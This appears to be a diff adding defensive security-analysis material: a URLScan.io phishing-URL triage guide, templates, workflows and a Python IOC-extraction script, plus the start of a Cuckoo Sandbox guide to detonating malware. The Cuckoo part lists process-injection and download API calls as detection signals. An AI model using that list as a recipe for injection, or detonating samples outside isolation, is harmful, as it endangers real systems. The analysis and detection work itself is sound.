- JavaScript-heavy pages with minimal HTML
|
||||
|
||||
## Implementation Steps
|
||||
|
||||
### Step 1: Submit URL to URLScan
|
||||
```
|
||||
Web: Navigate to https://urlscan.io and submit the suspicious URL
|
||||
API: POST https://urlscan.io/api/v1/scan/
|
||||
Header: API-Key: your-api-key
|
||||
Body: {"url": "https://suspicious-url.com", "visibility": "private"}
|
||||
```
|
||||
|
||||
### Step 2: Analyze Results
|
||||
- Review screenshot for brand impersonation
|
||||
- Check redirects and final destination URL
|
||||
- Examine DOM for credential input forms
|
||||
- Review network requests for data exfiltration endpoints
|
||||
- Check SSL certificate validity and issuer
|
||||
|
||||
### Step 3: Extract IOCs
|
||||
- Domains and IPs contacted
|
||||
- URLs in redirect chain
|
||||
- SHA-256 hashes of page resources
|
||||
- JavaScript file hashes
|
||||
|
||||
### Step 4: Cross-Reference with Threat Intelligence
|
||||
Use the `scripts/process.py` to automate URL scanning, extract IOCs, and cross-reference with VirusTotal, PhishTank, and Google Safe Browsing.
|
||||
|
||||
## Tools & Resources
|
||||
- **URLScan.io**: https://urlscan.io/
|
||||
- **URLScan API**: https://urlscan.io/docs/api/
|
||||
- **VirusTotal URL Scanner**: https://www.virustotal.com/
|
||||
- **PhishTank**: https://phishtank.org/
|
||||
- **Google Safe Browsing**: https://transparencyreport.google.com/safe-browsing/search
|
||||
- **Any.Run**: https://any.run/ (interactive sandbox)
|
||||
- **Hybrid Analysis**: https://www.hybrid-analysis.com/
|
||||
|
||||
## Validation
|
||||
- Successfully scan a suspicious URL via API
|
||||
- Extract screenshot and identify brand impersonation
|
||||
- Document complete redirect chain
|
||||
- Generate IOC list from scan results
|
||||
- Cross-reference findings with at least 2 threat intelligence sources
|
||||
@@ -0,0 +1,87 @@
|
||||
# URL Analysis Report Template
|
||||
|
||||
## Analysis Information
|
||||
- **Analyst**: [Name]
|
||||
- **Date**: [YYYY-MM-DD]
|
||||
- **Case ID**: [CASE-XXXX]
|
||||
- **Source**: [User report / Email gateway / SIEM alert]
|
||||
|
||||
## URL Details
|
||||
| Field | Value |
|
||||
|---|---|
|
||||
| Original URL | |
|
||||
| Defanged URL | hxxps://... |
|
||||
| Final URL (after redirects) | |
|
||||
| URLScan UUID | |
|
||||
| Scan visibility | private/public |
|
||||
|
||||
## Page Analysis
|
||||
| Field | Value |
|
||||
|---|---|
|
||||
| Page Title | |
|
||||
| HTTP Status | |
|
||||
| Server | |
|
||||
| Domain | |
|
||||
| IP Address | |
|
||||
| ASN | |
|
||||
| Country | |
|
||||
| Login Form Detected | Yes/No |
|
||||
|
||||
## TLS Certificate
|
||||
| Field | Value |
|
||||
|---|---|
|
||||
| Issuer | |
|
||||
| Subject | |
|
||||
| Valid From | |
|
||||
| Valid To | |
|
||||
| Certificate Age | |
|
||||
|
||||
## Redirect Chain
|
||||
| # | URL | Status |
|
||||
|---|---|---|
|
||||
| 1 (original) | | |
|
||||
| 2 | | |
|
||||
| 3 (final) | | |
|
||||
|
||||
## Threat Intelligence Cross-Reference
|
||||
| Source | Result | Score |
|
||||
|---|---|---|
|
||||
| URLScan Verdict | | |
|
||||
| VirusTotal | /XX engines | |
|
||||
| PhishTank | | |
|
||||
| Google Safe Browsing | | |
|
||||
| AbuseIPDB | | |
|
||||
|
||||
## IOCs Extracted
|
||||
### Domains
|
||||
| Domain | Role | Reputation |
|
||||
|---|---|---|
|
||||
| | | |
|
||||
|
||||
### IP Addresses
|
||||
| IP | ASN | Country | Reputation |
|
||||
|---|---|---|---|
|
||||
| | | | |
|
||||
|
||||
### File Hashes
|
||||
| Hash (SHA-256) | Type | Size |
|
||||
|---|---|---|
|
||||
| | | |
|
||||
|
||||
## Classification
|
||||
- [ ] Phishing - Credential Harvesting
|
||||
- [ ] Phishing - Malware Delivery
|
||||
- [ ] Scam / Fraud
|
||||
- [ ] Benign
|
||||
- [ ] Inconclusive
|
||||
|
||||
## Recommended Actions
|
||||
- [ ] Block domain at proxy/firewall
|
||||
- [ ] Block IP at firewall
|
||||
- [ ] Add to email gateway blocklist
|
||||
- [ ] Submit to PhishTank / APWG
|
||||
- [ ] Notify affected users
|
||||
- [ ] Request domain takedown
|
||||
|
||||
## Notes
|
||||
[Additional analysis observations]
|
||||
@@ -0,0 +1,42 @@
|
||||
# Standards & References: Analyzing Malicious URLs with URLScan
|
||||
|
||||
## MITRE ATT&CK References
|
||||
- **T1566.002**: Phishing: Spearphishing Link
|
||||
- **T1204.001**: User Execution: Malicious Link
|
||||
- **T1608.005**: Stage Capabilities: Link Target
|
||||
- **T1071.001**: Application Layer Protocol: Web Protocols
|
||||
- **T1102**: Web Service (for C2 via web)
|
||||
|
||||
## URLScan.io API Reference
|
||||
| Endpoint | Method | Description |
|
||||
|---|---|---|
|
||||
| `/api/v1/scan/` | POST | Submit URL for scanning |
|
||||
| `/api/v1/result/{uuid}/` | GET | Get scan results |
|
||||
| `/api/v1/search/?q=` | GET | Search scan database |
|
||||
| `/api/v1/result/{uuid}/screenshot/` | GET | Get page screenshot |
|
||||
| `/api/v1/result/{uuid}/dom/` | GET | Get rendered DOM |
|
||||
|
||||
### Search Query Syntax
|
||||
- `domain:example.com` - Search by domain
|
||||
- `ip:1.2.3.4` - Search by IP
|
||||
- `server:nginx` - Search by web server
|
||||
- `filename:login.php` - Search by filename
|
||||
- `hash:abc123` - Search by resource hash
|
||||
- `page.domain:example.com AND date:>now-7d` - Combined queries
|
||||
|
||||
## Industry Standards
|
||||
- **NIST SP 800-83**: Guide to Malware Incident Prevention and Handling
|
||||
- **NIST SP 800-86**: Guide to Integrating Forensic Techniques into Incident Response
|
||||
- **RFC 3986**: Uniform Resource Identifier (URI) syntax
|
||||
|
||||
## URL Classification Indicators
|
||||
| Indicator | Risk Level | Description |
|
||||
|---|---|---|
|
||||
| Domain age < 7 days | Critical | Very recently registered |
|
||||
| Domain age < 30 days | High | Recently registered |
|
||||
| Free TLS cert (Let's Encrypt) with brand impersonation | High | Common phishing pattern |
|
||||
| URL shortener | Medium | Obfuscates destination |
|
||||
| Credential input form on non-brand domain | Critical | Credential harvesting |
|
||||
| JavaScript obfuscation | High | Evasion technique |
|
||||
| Multiple redirects | Medium | Chain obfuscation |
|
||||
| Data URI scheme | High | Inline content, hard to trace |
|
||||
@@ -0,0 +1,96 @@
|
||||
# Workflows: Analyzing Malicious URLs with URLScan
|
||||
|
||||
## Workflow 1: URL Triage Pipeline
|
||||
|
||||
```
|
||||
Suspicious URL received (from user report / email gateway / SIEM)
|
||||
|
|
||||
v
|
||||
[Step 1: Defang and document URL]
|
||||
+-- Replace http with hxxp, . with [.]
|
||||
+-- Record original context (email subject, sender, timestamp)
|
||||
|
|
||||
v
|
||||
[Step 2: Submit to URLScan (private visibility)]
|
||||
+-- POST to /api/v1/scan/
|
||||
+-- Wait for scan completion (poll /api/v1/result/{uuid}/)
|
||||
|
|
||||
v
|
||||
[Step 3: Analyze results]
|
||||
+-- Review screenshot for brand impersonation
|
||||
+-- Check redirect chain (original URL vs final URL)
|
||||
+-- Examine DOM for login forms / credential inputs
|
||||
+-- Review network requests for suspicious endpoints
|
||||
+-- Check SSL certificate details
|
||||
|
|
||||
v
|
||||
[Step 4: Classify]
|
||||
+-- Phishing (credential harvesting)
|
||||
+-- Malware delivery
|
||||
+-- Scam / fraud
|
||||
+-- Benign (false positive)
|
||||
|
|
||||
v
|
||||
[Step 5: Action]
|
||||
+-- If malicious: Extract IOCs, block domain/IP, update filters
|
||||
+-- If benign: Document and close
|
||||
+-- If uncertain: Escalate for deeper analysis
|
||||
```
|
||||
|
||||
## Workflow 2: Bulk URL Analysis
|
||||
|
||||
```
|
||||
URL list from email gateway / threat feed
|
||||
|
|
||||
v
|
||||
[Batch submit to URLScan API]
|
||||
+-- Rate limit: 2 submissions/second (free tier)
|
||||
+-- Use private visibility for sensitive URLs
|
||||
|
|
||||
v
|
||||
[Collect all results]
|
||||
+-- Poll each scan UUID for completion
|
||||
+-- Download screenshots and DOM content
|
||||
|
|
||||
v
|
||||
[Automated triage]
|
||||
+-- Flag: credential input forms detected
|
||||
+-- Flag: brand impersonation in screenshot
|
||||
+-- Flag: known phishing infrastructure (IP/ASN)
|
||||
+-- Flag: newly registered domains
|
||||
|
|
||||
v
|
||||
[Generate report]
|
||||
+-- Categorized URL list (malicious / suspicious / clean)
|
||||
+-- IOC extract for blocking
|
||||
+-- Statistics summary
|
||||
```
|
||||
|
||||
## Workflow 3: IOC Extraction and Enrichment
|
||||
|
||||
```
|
||||
URLScan result available
|
||||
|
|
||||
v
|
||||
[Extract from scan]
|
||||
+-- All domains contacted
|
||||
+-- All IPs contacted
|
||||
+-- SSL certificate fingerprints
|
||||
+-- JavaScript file hashes
|
||||
+-- Page resource hashes
|
||||
+-- Final redirect URL
|
||||
|
|
||||
v
|
||||
[Cross-reference]
|
||||
+-- VirusTotal: domain/IP/hash reputation
|
||||
+-- PhishTank: known phishing URL database
|
||||
+-- WHOIS: domain registration details
|
||||
+-- AbuseIPDB: IP abuse reports
|
||||
+-- Google Safe Browsing: malware/phishing flags
|
||||
|
|
||||
v
|
||||
[Compile IOC package]
|
||||
+-- STIX/TAXII format for TIP
|
||||
+-- CSV for firewall/proxy rules
|
||||
+-- JSON for SIEM enrichment
|
||||
```
|
||||
@@ -0,0 +1,439 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
URLScan.io URL Analysis Automation
|
||||
|
||||
Submits suspicious URLs to URLScan.io for analysis, retrieves results,
|
||||
extracts IOCs, and cross-references with threat intelligence sources.
|
||||
|
||||
Usage:
|
||||
python process.py scan --url "https://suspicious-site.com"
|
||||
python process.py scan --url-file urls.txt
|
||||
python process.py result --uuid <scan-uuid>
|
||||
python process.py search --query "domain:evil.com"
|
||||
python process.py ioc --uuid <scan-uuid>
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import os
|
||||
import hashlib
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
from dataclasses import dataclass, field, asdict
|
||||
|
||||
try:
|
||||
import requests
|
||||
HAS_REQUESTS = True
|
||||
except ImportError:
|
||||
HAS_REQUESTS = False
|
||||
|
||||
URLSCAN_API_KEY = os.environ.get("URLSCAN_API_KEY", "")
|
||||
URLSCAN_BASE = "https://urlscan.io/api/v1"
|
||||
VT_API_KEY = os.environ.get("VT_API_KEY", "")
|
||||
|
||||
|
||||
@dataclass
|
||||
class URLScanResult:
|
||||
"""Parsed URLScan result."""
|
||||
uuid: str = ""
|
||||
url: str = ""
|
||||
effective_url: str = ""
|
||||
status_code: int = 0
|
||||
domain: str = ""
|
||||
ip: str = ""
|
||||
asn: str = ""
|
||||
asn_name: str = ""
|
||||
country: str = ""
|
||||
server: str = ""
|
||||
title: str = ""
|
||||
tls_issuer: str = ""
|
||||
tls_subject: str = ""
|
||||
tls_valid_from: str = ""
|
||||
tls_valid_to: str = ""
|
||||
screenshot_url: str = ""
|
||||
dom_url: str = ""
|
||||
technologies: list = field(default_factory=list)
|
||||
redirects: list = field(default_factory=list)
|
||||
domains_contacted: list = field(default_factory=list)
|
||||
ips_contacted: list = field(default_factory=list)
|
||||
urls_contacted: list = field(default_factory=list)
|
||||
has_login_form: bool = False
|
||||
resource_hashes: list = field(default_factory=list)
|
||||
verdicts: dict = field(default_factory=dict)
|
||||
is_malicious: bool = False
|
||||
risk_indicators: list = field(default_factory=list)
|
||||
|
||||
|
||||
def submit_scan(url: str, visibility: str = "private",
|
||||
api_key: str = "") -> dict:
|
||||
"""Submit a URL to URLScan for scanning."""
|
||||
if not api_key:
|
||||
api_key = URLSCAN_API_KEY
|
||||
if not api_key:
|
||||
print("Warning: No URLScan API key provided. Using public submission.", file=sys.stderr)
|
||||
|
||||
headers = {"Content-Type": "application/json"}
|
||||
if api_key:
|
||||
headers["API-Key"] = api_key
|
||||
|
||||
data = {"url": url, "visibility": visibility}
|
||||
|
||||
try:
|
||||
resp = requests.post(f"{URLSCAN_BASE}/scan/", headers=headers,
|
||||
json=data, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
return resp.json()
|
||||
elif resp.status_code == 429:
|
||||
print("Rate limited. Waiting 10 seconds...", file=sys.stderr)
|
||||
time.sleep(10)
|
||||
resp = requests.post(f"{URLSCAN_BASE}/scan/", headers=headers,
|
||||
json=data, timeout=30)
|
||||
return resp.json() if resp.status_code == 200 else {"error": resp.text}
|
||||
else:
|
||||
return {"error": f"HTTP {resp.status_code}: {resp.text}"}
|
||||
except Exception as e:
|
||||
return {"error": str(e)}
|
||||
|
||||
|
||||
def get_result(uuid: str, api_key: str = "", max_wait: int = 60) -> dict:
|
||||
"""Get scan results, polling until ready."""
|
||||
if not api_key:
|
||||
api_key = URLSCAN_API_KEY
|
||||
|
||||
headers = {}
|
||||
if api_key:
|
||||
headers["API-Key"] = api_key
|
||||
|
||||
for attempt in range(max_wait // 5):
|
||||
try:
|
||||
resp = requests.get(f"{URLSCAN_BASE}/result/{uuid}/",
|
||||
headers=headers, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
return resp.json()
|
||||
elif resp.status_code == 404:
|
||||
time.sleep(5)
|
||||
continue
|
||||
else:
|
||||
return {"error": f"HTTP {resp.status_code}: {resp.text}"}
|
||||
except Exception as e:
|
||||
return {"error": str(e)}
|
||||
|
||||
return {"error": "Timeout waiting for scan results"}
|
||||
|
||||
|
||||
def search_scans(query: str, api_key: str = "", size: int = 10) -> list:
|
||||
"""Search URLScan database."""
|
||||
if not api_key:
|
||||
api_key = URLSCAN_API_KEY
|
||||
|
||||
headers = {}
|
||||
if api_key:
|
||||
headers["API-Key"] = api_key
|
||||
|
||||
try:
|
||||
resp = requests.get(f"{URLSCAN_BASE}/search/?q={query}&size={size}",
|
||||
headers=headers, timeout=30)
|
||||
if resp.status_code == 200:
|
||||
return resp.json().get("results", [])
|
||||
except Exception:
|
||||
pass
|
||||
return []
|
||||
|
||||
|
||||
def parse_result(raw_result: dict) -> URLScanResult:
|
||||
"""Parse raw URLScan API result into structured data."""
|
||||
result = URLScanResult()
|
||||
|
||||
task = raw_result.get("task", {})
|
||||
result.uuid = task.get("uuid", "")
|
||||
result.url = task.get("url", "")
|
||||
|
||||
page = raw_result.get("page", {})
|
||||
result.effective_url = page.get("url", "")
|
||||
result.status_code = page.get("status", 0)
|
||||
result.domain = page.get("domain", "")
|
||||
result.ip = page.get("ip", "")
|
||||
result.asn = page.get("asn", "")
|
||||
result.asn_name = page.get("asnname", "")
|
||||
result.country = page.get("country", "")
|
||||
result.server = page.get("server", "")
|
||||
result.title = page.get("title", "")
|
||||
|
||||
# TLS info
|
||||
tls_list = raw_result.get("lists", {}).get("certificates", [])
|
||||
if tls_list:
|
||||
cert = tls_list[0]
|
||||
result.tls_issuer = cert.get("issuer", "")
|
||||
result.tls_subject = cert.get("subjectName", "")
|
||||
result.tls_valid_from = cert.get("validFrom", "")
|
||||
result.tls_valid_to = cert.get("validTo", "")
|
||||
|
||||
# Screenshot and DOM URLs
|
||||
result.screenshot_url = f"https://urlscan.io/screenshots/{result.uuid}.png"
|
||||
result.dom_url = f"https://urlscan.io/dom/{result.uuid}/"
|
||||
|
||||
# Technologies
|
||||
meta = raw_result.get("meta", {})
|
||||
for processor in meta.get("processors", {}).values():
|
||||
if isinstance(processor, dict) and "data" in processor:
|
||||
techs = processor["data"]
|
||||
if isinstance(techs, list):
|
||||
for tech in techs:
|
||||
if isinstance(tech, dict) and "app" in tech:
|
||||
result.technologies.append(tech["app"])
|
||||
|
||||
# Redirects
|
||||
data = raw_result.get("data", {})
|
||||
for request in data.get("requests", [])[:5]:
|
||||
req_url = request.get("request", {}).get("request", {}).get("url", "")
|
||||
resp_url = request.get("response", {}).get("response", {}).get("url", "")
|
||||
if req_url != result.url:
|
||||
result.redirects.append(req_url)
|
||||
|
||||
# Domains and IPs contacted
|
||||
lists = raw_result.get("lists", {})
|
||||
result.domains_contacted = lists.get("domains", [])
|
||||
result.ips_contacted = lists.get("ips", [])
|
||||
result.urls_contacted = lists.get("urls", [])[:50]
|
||||
|
||||
# Resource hashes
|
||||
for request in data.get("requests", []):
|
||||
resp_data = request.get("response", {}).get("response", {})
|
||||
resp_hash = resp_data.get("hash", "")
|
||||
if resp_hash:
|
||||
result.resource_hashes.append({
|
||||
"url": resp_data.get("url", ""),
|
||||
"hash": resp_hash,
|
||||
"size": resp_data.get("size", 0),
|
||||
"mimeType": resp_data.get("mimeType", "")
|
||||
})
|
||||
|
||||
# Check for login forms in DOM
|
||||
dom_content = raw_result.get("data", {}).get("dom", "")
|
||||
if isinstance(dom_content, str):
|
||||
if ('type="password"' in dom_content.lower() or
|
||||
'input type=password' in dom_content.lower() or
|
||||
'<form' in dom_content.lower()):
|
||||
result.has_login_form = True
|
||||
|
||||
# Verdicts
|
||||
verdicts = raw_result.get("verdicts", {})
|
||||
result.verdicts = {
|
||||
"overall_score": verdicts.get("overall", {}).get("score", 0),
|
||||
"overall_malicious": verdicts.get("overall", {}).get("malicious", False),
|
||||
"urlscan_score": verdicts.get("urlscan", {}).get("score", 0),
|
||||
"engines": verdicts.get("engines", {}).get("malicious", []),
|
||||
"community_score": verdicts.get("community", {}).get("score", 0),
|
||||
}
|
||||
result.is_malicious = verdicts.get("overall", {}).get("malicious", False)
|
||||
|
||||
# Risk indicators
|
||||
if result.has_login_form and result.domain != result.url.split("/")[2]:
|
||||
result.risk_indicators.append("Credential harvesting form on non-origin domain")
|
||||
if result.url != result.effective_url:
|
||||
result.risk_indicators.append(f"URL redirected: {result.url} -> {result.effective_url}")
|
||||
if result.is_malicious:
|
||||
result.risk_indicators.append("Flagged as malicious by URLScan verdicts")
|
||||
if len(result.redirects) > 3:
|
||||
result.risk_indicators.append(f"Excessive redirects ({len(result.redirects)})")
|
||||
|
||||
return result
|
||||
|
||||
|
||||
def extract_iocs(result: URLScanResult) -> dict:
|
||||
"""Extract IOCs from scan result."""
|
||||
iocs = {
|
||||
"domains": list(set(result.domains_contacted)),
|
||||
"ips": list(set(result.ips_contacted)),
|
||||
"urls": [result.url, result.effective_url] + result.redirects,
|
||||
"hashes": [h["hash"] for h in result.resource_hashes if h.get("hash")],
|
||||
"tls_fingerprint": result.tls_subject,
|
||||
"scan_uuid": result.uuid,
|
||||
"scan_date": datetime.now(timezone.utc).isoformat(),
|
||||
}
|
||||
# Deduplicate URLs
|
||||
iocs["urls"] = list(set(u for u in iocs["urls"] if u))
|
||||
return iocs
|
||||
|
||||
|
||||
def check_virustotal(url: str, api_key: str = "") -> dict:
|
||||
"""Check URL against VirusTotal (requires API key)."""
|
||||
if not api_key:
|
||||
api_key = VT_API_KEY
|
||||
if not api_key:
|
||||
return {}
|
||||
|
||||
url_id = hashlib.sha256(url.encode()).hexdigest()
|
||||
headers = {"x-apikey": api_key}
|
||||
|
||||
try:
|
||||
resp = requests.get(f"https://www.virustotal.com/api/v3/urls/{url_id}",
|
||||
headers=headers, timeout=15)
|
||||
if resp.status_code == 200:
|
||||
data = resp.json().get("data", {}).get("attributes", {})
|
||||
stats = data.get("last_analysis_stats", {})
|
||||
return {
|
||||
"malicious": stats.get("malicious", 0),
|
||||
"suspicious": stats.get("suspicious", 0),
|
||||
"harmless": stats.get("harmless", 0),
|
||||
"undetected": stats.get("undetected", 0),
|
||||
}
|
||||
except Exception:
|
||||
pass
|
||||
return {}
|
||||
|
||||
|
||||
def format_report(result: URLScanResult) -> str:
|
||||
"""Format scan result as text report."""
|
||||
lines = []
|
||||
lines.append("=" * 60)
|
||||
lines.append(" URL ANALYSIS REPORT (URLScan.io)")
|
||||
lines.append("=" * 60)
|
||||
lines.append(f" Scan UUID: {result.uuid}")
|
||||
lines.append(f" Submitted URL: {result.url}")
|
||||
lines.append(f" Effective URL: {result.effective_url}")
|
||||
lines.append(f" Status Code: {result.status_code}")
|
||||
lines.append(f" Malicious: {'YES' if result.is_malicious else 'NO'}")
|
||||
lines.append("")
|
||||
|
||||
lines.append("[PAGE INFO]")
|
||||
lines.append(f" Title: {result.title}")
|
||||
lines.append(f" Domain: {result.domain}")
|
||||
lines.append(f" IP: {result.ip}")
|
||||
lines.append(f" ASN: {result.asn} ({result.asn_name})")
|
||||
lines.append(f" Country: {result.country}")
|
||||
lines.append(f" Server: {result.server}")
|
||||
lines.append(f" Login Form: {'DETECTED' if result.has_login_form else 'Not found'}")
|
||||
lines.append(f" Screenshot: {result.screenshot_url}")
|
||||
lines.append("")
|
||||
|
||||
if result.tls_issuer:
|
||||
lines.append("[TLS CERTIFICATE]")
|
||||
lines.append(f" Issuer: {result.tls_issuer}")
|
||||
lines.append(f" Subject: {result.tls_subject}")
|
||||
lines.append("")
|
||||
|
||||
if result.redirects:
|
||||
lines.append(f"[REDIRECTS] ({len(result.redirects)} found)")
|
||||
for r in result.redirects[:10]:
|
||||
lines.append(f" -> {r}")
|
||||
lines.append("")
|
||||
|
||||
if result.risk_indicators:
|
||||
lines.append(f"[RISK INDICATORS] ({len(result.risk_indicators)})")
|
||||
for ind in result.risk_indicators:
|
||||
lines.append(f" - {ind}")
|
||||
lines.append("")
|
||||
|
||||
lines.append(f"[INFRASTRUCTURE]")
|
||||
lines.append(f" Domains contacted: {len(result.domains_contacted)}")
|
||||
lines.append(f" IPs contacted: {len(result.ips_contacted)}")
|
||||
lines.append(f" Resource hashes: {len(result.resource_hashes)}")
|
||||
|
||||
lines.append("=" * 60)
|
||||
return "\n".join(lines)
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="URLScan.io URL Analysis Tool")
|
||||
subparsers = parser.add_subparsers(dest="command")
|
||||
|
||||
scan_parser = subparsers.add_parser("scan", help="Scan a URL")
|
||||
scan_parser.add_argument("--url", help="Single URL to scan")
|
||||
scan_parser.add_argument("--url-file", help="File with URLs (one per line)")
|
||||
scan_parser.add_argument("--visibility", default="private",
|
||||
choices=["public", "unlisted", "private"])
|
||||
scan_parser.add_argument("--wait", action="store_true", help="Wait for results")
|
||||
|
||||
result_parser = subparsers.add_parser("result", help="Get scan result")
|
||||
result_parser.add_argument("--uuid", required=True)
|
||||
|
||||
search_parser = subparsers.add_parser("search", help="Search URLScan database")
|
||||
search_parser.add_argument("--query", "-q", required=True)
|
||||
search_parser.add_argument("--size", type=int, default=10)
|
||||
|
||||
ioc_parser = subparsers.add_parser("ioc", help="Extract IOCs from scan")
|
||||
ioc_parser.add_argument("--uuid", required=True)
|
||||
|
||||
parser.add_argument("--api-key", default=URLSCAN_API_KEY)
|
||||
parser.add_argument("--json", action="store_true")
|
||||
parser.add_argument("--output", "-o")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if not HAS_REQUESTS:
|
||||
print("Error: 'requests' library required", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
|
||||
api_key = args.api_key
|
||||
|
||||
if args.command == "scan":
|
||||
urls = []
|
||||
if args.url:
|
||||
urls.append(args.url)
|
||||
elif args.url_file:
|
||||
with open(args.url_file) as f:
|
||||
urls = [line.strip() for line in f if line.strip()]
|
||||
|
||||
for url in urls:
|
||||
print(f"Scanning: {url}")
|
||||
scan_result = submit_scan(url, args.visibility, api_key)
|
||||
|
||||
if "error" in scan_result:
|
||||
print(f" Error: {scan_result['error']}", file=sys.stderr)
|
||||
continue
|
||||
|
||||
uuid = scan_result.get("uuid", "")
|
||||
print(f" UUID: {uuid}")
|
||||
print(f" Result URL: https://urlscan.io/result/{uuid}/")
|
||||
|
||||
if args.wait and uuid:
|
||||
print(" Waiting for results...")
|
||||
time.sleep(10)
|
||||
raw = get_result(uuid, api_key)
|
||||
if "error" not in raw:
|
||||
result = parse_result(raw)
|
||||
if args.json:
|
||||
print(json.dumps(asdict(result), indent=2, default=str))
|
||||
else:
|
||||
print(format_report(result))
|
||||
|
||||
if len(urls) > 1:
|
||||
time.sleep(2) # Rate limiting
|
||||
|
||||
elif args.command == "result":
|
||||
raw = get_result(args.uuid, api_key)
|
||||
if "error" in raw:
|
||||
print(f"Error: {raw['error']}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
result = parse_result(raw)
|
||||
if args.json:
|
||||
print(json.dumps(asdict(result), indent=2, default=str))
|
||||
else:
|
||||
print(format_report(result))
|
||||
|
||||
elif args.command == "search":
|
||||
results = search_scans(args.query, api_key, args.size)
|
||||
for r in results:
|
||||
task = r.get("task", {})
|
||||
page = r.get("page", {})
|
||||
print(f" {task.get('time', '')} | {task.get('url', '')} | "
|
||||
f"{page.get('domain', '')} | {page.get('ip', '')}")
|
||||
|
||||
elif args.command == "ioc":
|
||||
raw = get_result(args.uuid, api_key)
|
||||
if "error" in raw:
|
||||
print(f"Error: {raw['error']}", file=sys.stderr)
|
||||
sys.exit(1)
|
||||
result = parse_result(raw)
|
||||
iocs = extract_iocs(result)
|
||||
print(json.dumps(iocs, indent=2))
|
||||
|
||||
else:
|
||||
parser.print_help()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,287 @@
|
||||
---
|
||||
name: analyzing-malware-behavior-with-cuckoo-sandbox
|
||||
description: >
|
||||
Executes malware samples in Cuckoo Sandbox to observe runtime behavior including
|
||||
process creation, file system modifications, registry changes, network communications,
|
||||
and API calls. Generates comprehensive behavioral reports for malware classification
|
||||
and IOC extraction. Activates for requests involving dynamic malware analysis, sandbox
|
||||
detonation, behavioral analysis, or automated malware execution.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, dynamic-analysis, sandbox, Cuckoo, behavioral-analysis]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Malware Behavior with Cuckoo Sandbox
|
||||
|
||||
## When to Use
|
||||
|
||||
- A suspicious sample passed static analysis triage and requires behavioral observation in a controlled environment
|
||||
- You need to capture network traffic, file drops, registry modifications, and API calls from a malware execution
|
||||
- Determining the full infection chain including second-stage payload downloads and persistence mechanisms
|
||||
- Generating behavioral signatures and YARA rules based on observed runtime activity
|
||||
- Automated analysis of bulk malware samples requiring consistent reporting
|
||||
|
||||
**Do not use** when the sample is a known ransomware variant that may spread via network shares in a misconfigured sandbox; verify network isolation first.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Cuckoo Sandbox 3.x installed on a dedicated analysis server (Ubuntu 22.04 recommended)
|
||||
- Guest VMs configured with Windows 10/11 snapshots (Cuckoo agent installed, snapshots taken at clean state)
|
||||
- VirtualBox, KVM, or VMware configured as the Cuckoo virtualization backend
|
||||
- Isolated network with InetSim or FakeNet-NG for simulating internet services
|
||||
- Suricata or Snort integrated for network-level signature matching during analysis
|
||||
- Sufficient disk space for PCAP captures and memory dumps (minimum 500 GB recommended)
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Submit Sample to Cuckoo
|
||||
|
||||
Submit the malware sample for automated analysis:
|
||||
|
||||
```bash
|
||||
# Submit via command line
|
||||
cuckoo submit /path/to/suspect.exe
|
||||
|
||||
# Submit with specific analysis timeout (300 seconds)
|
||||
cuckoo submit --timeout 300 /path/to/suspect.exe
|
||||
|
||||
# Submit with specific VM and analysis package
|
||||
cuckoo submit --machine win10_x64 --package exe --timeout 300 /path/to/suspect.exe
|
||||
|
||||
# Submit via REST API
|
||||
curl -F "file=@suspect.exe" -F "timeout=300" -F "machine=win10_x64" \
|
||||
http://localhost:8090/tasks/create/file
|
||||
|
||||
# Submit URL for analysis
|
||||
curl -F "url=http://malicious-site.com/payload" -F "timeout=300" \
|
||||
http://localhost:8090/tasks/create/url
|
||||
|
||||
# Check task status
|
||||
curl http://localhost:8090/tasks/view/1 | jq '.task.status'
|
||||
```
|
||||
|
||||
### Step 2: Monitor Execution in Real-Time
|
||||
|
||||
Track the analysis progress and observe live behavior:
|
||||
|
||||
```bash
|
||||
# Watch Cuckoo analysis log
|
||||
tail -f /opt/cuckoo/log/cuckoo.log
|
||||
|
||||
# Monitor analysis task status
|
||||
cuckoo status
|
||||
|
||||
# Access Cuckoo web interface for live screenshots and process tree
|
||||
# Navigate to http://localhost:8080/analysis/<task_id>/
|
||||
```
|
||||
|
||||
Key behavioral events to watch during execution:
|
||||
- Process creation chain (parent-child relationships)
|
||||
- Network connection attempts to external IPs
|
||||
- File drops in temporary directories or system folders
|
||||
- Registry modifications to Run keys or service entries
|
||||
- API calls related to encryption (CryptEncrypt), injection (WriteProcessMemory), or evasion
|
||||
|
||||
### Step 3: Analyze Process Activity
|
||||
|
||||
Review the process tree and API call trace from the Cuckoo report:
|
||||
|
||||
```python
|
||||
# Parse Cuckoo JSON report programmatically
|
||||
import json
|
||||
|
||||
with open("/opt/cuckoo/storage/analyses/1/reports/report.json") as f:
|
||||
report = json.load(f)
|
||||
|
||||
# Process tree analysis
|
||||
for process in report["behavior"]["processes"]:
|
||||
pid = process["pid"]
|
||||
ppid = process["ppid"]
|
||||
name = process["process_name"]
|
||||
print(f"PID: {pid} PPID: {ppid} Name: {name}")
|
||||
|
||||
# Extract suspicious API calls
|
||||
for call in process["calls"]:
|
||||
api = call["api"]
|
||||
if api in ["CreateRemoteThread", "VirtualAllocEx", "WriteProcessMemory",
|
||||
"NtCreateThreadEx", "RegSetValueExA", "URLDownloadToFileA"]:
|
||||
args = {arg["name"]: arg["value"] for arg in call["arguments"]}
|
||||
print(f" [!] {api}({args})")
|
||||
```
|
||||
|
||||
### Step 4: Review Network Activity
|
||||
|
||||
Examine network connections, DNS queries, and HTTP requests:
|
||||
|
||||
```python
|
||||
# Network analysis from Cuckoo report
|
||||
network = report["network"]
|
||||
|
||||
# DNS resolutions
|
||||
print("DNS Queries:")
|
||||
for dns in network.get("dns", []):
|
||||
print(f" {dns['request']} -> {dns.get('answers', [])}")
|
||||
|
